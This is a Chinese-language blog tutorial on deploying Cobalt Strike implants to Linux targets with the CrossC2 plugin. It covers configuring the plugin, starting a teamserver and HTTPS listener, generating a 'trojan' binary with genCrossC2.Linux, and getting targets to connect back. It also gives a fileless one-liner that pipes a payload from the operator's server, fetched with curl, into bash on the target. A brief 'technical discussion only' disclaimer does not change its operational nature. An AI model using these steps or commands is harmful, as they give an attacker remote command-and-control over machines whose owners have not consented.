我喜欢SEO、网络营销及建站,希望与志同道合的您
建立合作或相互学习关系 QQ:10343829
        找回密码

Cobalt Strike 通过 Crosscs2 上线linux

2021-08-24 分类:渗透工具 阅读(128) 评论(0)
前言:  cs上线linux需要使用:CrossC2 
声明:本文仅探讨技术,请勿非法使用。

官方地址:https://github.com/gloxec/CrossC2

一、 根据你使用的cs版本选择对应版本的CrossC2 版本

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

由上面的项目可以知道CrossC2有5个分支,分别是: 

cs4.1  :    如果你使用的CS版本是4.1 ,那么可以使用这个分支
cs4.0 :     如果你使用的CS版本是4.0 ,那么可以使用这个分支
master :    这个只支持 3.1.4 版本
CrossC2Kit:  CrossC2 扩展功能,执行各种命令等    
另外还有Release 不同Release版本支持不同cs版本
根据你使用的cs版本选择合适的CrossC2 版本
1. Cobalt Strike 3.14 : 
   (1). https://github.com/gloxec/CrossC2/tree/master        (专版只能v3.14使用)
   (2). https://github.com/gloxec/CrossC2/releases/tag/v2.1 
   (releases版本只要小于v2.1就可以,2.1是3.14支持的最新版,建议选择v2.1版本) 
2. Cobalt Strike 4.0  : https://github.com/gloxec/CrossC2/tree/cs4.0/src   (cs4.0只能用这个)  
3. Cobalt Strike 4.1 (两个选择) :
 https://github.com/gloxec/CrossC2/tree/cs4.1  (4.1专版)
 https://github.com/gloxec/CrossC2/releases/tag/v2.2.5 (在Release 页面找>=v2.2的版本均可,建议使用最新版

二 、开始准备

1.  准备一个cs,具体到哪里下载,这个你自己找,本文以cs3.14为例

2.  下载CroosC2版本,根据上面介绍及自己使用的cs版本,选择适合你的CroosC2版本

三、 配置 Crosscs2

1.  将下载的 Crosscs2 放到客户端的Cobalt Strike 根目录 

 

 

 

 

 

 

 

 

 

 

2.  进入CrossC2-master/src目录

里面包含CrossC2.cna和对应三个系统的载荷,最主要的配置是在CrossC2.cna里,也是要加载的插件(要通过脚本管理器加载的)

 

 

 

 

 

 

四、编辑 插 件 

1. 插件是 CrossC2.cna ,首先使用编辑器编辑该插件修改下面部分(2.0版本是第三行、第四行): 

$CC2_PATH = "/opt/cs3.14/CrossC2/src/"; # <-------- fix // 这个就是本地(客户端)cs同目录下CrossC2项目src的目录 
$CC2_BIN = "genCrossC2.Linux";                 // 这里就是genCrossC2.Linux 就行了

五、启动cs并在客户端建立https监听

1.  服务器SSH 切到 cs 目录执行: ./teamserver 服务器ip 密码     启动服务

2.  Crosscs2   只支持https ,所以要建立一个https 监听


 

 

 

 

 

 

 

 

六、加载脚本

2.  打开cs客户端,使用脚本管理器加载脚本

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

七、本地客户端证书安装

将cs服务端根目录下面的  .cobaltstrike.beacon_keys (如果服务器是windows,这个文件是隐藏的,让他显示出来) 下载下来放到客户端cs的src目录然后执行 chmod +x .cobaltstrike.beacon_keys 给与可执行权限即可。(注意从哪里复制到哪里)

八、生成上线代码:

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

         也可以在CrossC2的src目录执行: /genCrossC2.Linux 192.168.1.155 4431 /home/cs3.14/CrossC2/src/.cobaltstrike.beacon_keys null Linux x64 ceshi1 来生成一个木马文件 其中的: /home/cs3.14/CrossC2/src/.cobaltstrike.beacon_keys 是指定了从服务器下载到本地src目录证书的位置, 不指定会自动寻找,但是有时候会出现不指定找不到的情况,导致无法上线,所以指定一下还是比较保险的。

九、最后一步:上线linux  

1. 木马文件上线linux方法:

      test 这个木马将保存在cs根目录,下载下来,然后传到靶机上面,chmod +x test 给与权限 ,然后执行  ./test  即可上线linux 。

2. 无文件直接上线linux方法:

直接在靶机上面执行:curl -A o -o- -L http://192.168.1.107:5050/a | bash -s  运行结束后靶机会上线

 

 

 

 

 

 

 

 

 

十、使用扩展功能、使用扩展后可以对linux执行各种命令等: 

cs4.1扩展分支:    https://github.com/gloxec/CrossC2/tree/cs4.1/CrossC2Kit
cs4.0扩展分支:    https://github.com/gloxec/CrossC2/tree/cs4.0/CrossC2Kit
cs3.14扩展分支:  https://github.com/gloxec/CrossC2/tree/master/CrossC2Kit

如果使用的是Release 版本,则下载源代码

 

 

 

 

 

 

 

 

 

 

参考文章:  https://www.cnblogs.com/xuanlvsec/p/14240479.html

 

转载请著名来源:天天小站 » Cobalt Strike 通过 Crosscs2 上线linux

分享到:更多 ()

相关推荐